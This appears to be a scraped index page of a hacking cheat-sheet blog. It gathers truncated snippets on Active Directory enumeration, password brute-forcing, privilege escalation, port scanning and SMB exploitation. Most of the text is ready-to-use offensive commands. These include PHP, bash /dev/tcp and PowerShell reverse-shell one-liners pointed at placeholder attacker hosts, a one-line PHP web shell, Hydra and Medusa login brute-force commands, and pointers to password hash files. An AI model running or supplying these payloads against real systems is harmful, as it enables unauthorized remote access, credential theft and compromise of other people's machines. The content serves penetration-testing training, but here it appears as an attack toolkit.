Hey, KEEP CALM and hack away…
Table of Contents Enumeration Overall Information Enum4linux PowerView Module Domain Objects DNS Info System Relationship BloodHound-python SharpHound.ps1 GPP Policy Foothold Asrep Roasting Lateral Movement Pass the Password Pass the Hash Dump NTLM Hashes Dump SAM/LSA Token Impersonation DLL Hijacking Dump NTDS Enumeration Overall Information Enum4linux You have nothing, just want a overview of the system…
Table of Contents Bash Python Bash SHELL=/bin/bash script -q /dev/null Python python -c 'import pty;pty.spawn("/bin/bash")'
Table of Contents JohnTheRipper Medusa Online Resources Hydra Parator JohnTheRipper zip2john <zipfile> > <outputfile> john <hashfile> –fork=4 –wordlist=<wordlist> Medusa # brute forcing SSH login with usernames and passwords medusa -h <host-ip> -U <user-file> -P <passwd-file> -M ssh <host-ip> Online Resources Hash crack – CrackStation Hydra hydra -l <username> -P <pass-file> http://domain http-post-form "</login/path/>:<login-data>[username=^USER^&password=^PASS^]:<error-response>[Incorrect Username]" Parator…
Table of Contents Linux Find SetUID Files Check User Privileges Interactive Programs with SUDO Privilege RottenPotato Kernel 2.6 LXD LXC Privilege Escalation Priv Escalation Through Sudoers Conf Exploit Suggester Rational Love VNC Linux Find SetUID Files find / -perm -4000 -type f 2>/dev/null Check User Privileges sudo -l -l Interactive Programs with SUDO Privilege sudo…
Table of Contents PHP Reverse Shell Bash NetCat Net Cat CheetSheet Bat File PHP Reverse Shell php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' /usr/share/webshells/php/php-reverse-shell.php # cmd execution <?php system($_REQUEST['mycmd']) ?> Bash bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' NetCat nc <host> <port> If in meterpreter shell: execute -f…
Table of Contents Dirbuster Gobuster Dirsearch Wfuzz Other Useful Tools Dirbuster dirbuster -u -v -u <URL> -e <extensions> -l <wordlist> -r <report-location> Gobuster gobuster dir|dns <URL> -v -t <threads> -w <wordlist> Dirsearch dirsearch.py -u <URL> -e <extensions> -t <threads> -c <cookies> –proxy=<proxy> Wfuzz wfuzz -c -v –hc <status-code> -w <wordlist> <URL>/FUZZ/* Other Useful Tools Tons…
Table of Contents Nmap Masscan Unicorn Scan Nmap nmap -A -T4 -p- -v -oN nmap.txt <host> Masscan masscan -p 1-65535 <host> -e <interface> –rate=<rate> Unicorn Scan us -mT -Iv <host>:<ports[a|]> -r <rate[3000|]> -R <round[3|]>
Table of Contents Reverse Shell One liner PowerSploit Invoke-Shellcode Invoke-WmiMethod Get-Keystrokes Exfiltration/Out-Minidump.ps1 Exfiltration/Get-TimedScreenshot.ps1 Nishang Get-Information.ps1 Get-WLAN-Keys.ps1 StartListener.py Ps_encoder.py Get System Release ID Executing Command as Another User Get User ACL Go into Registry Mode Reverse Shell One liner $client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName…
Table of Contents Linux Password Hash Files History Configuration Files Windows Coinfiguration Files Hash Files Windows System Info Linux Password Hash Files passwd, shadow Content – User passwod hashes Features – SHA256Crypt hash Location – /etc Handle – unshadow <passfile> <shadowfile> then hashcat or john History bash_history Content – bash history Features – may contain…
Table of Contents Samba Enumeration Smbclient Crackmapexec Psexec_command or Usermap_script Msf Foothold MS_17_010 Psexec.py Psexec Msf Smb_login Msf DistCC Foothold CVE-2004-2687 Samba Enumeration Smbclient List all shares smbclient -L \\\\<URL>\\ Crackmapexec List all shares crackmapexec smb <ip> -u <username> -p <password> –shares Psexec_command or Usermap_script Msf Execute smb command auxiliary/admin/smb/psexec_command set COMMAND [command you want…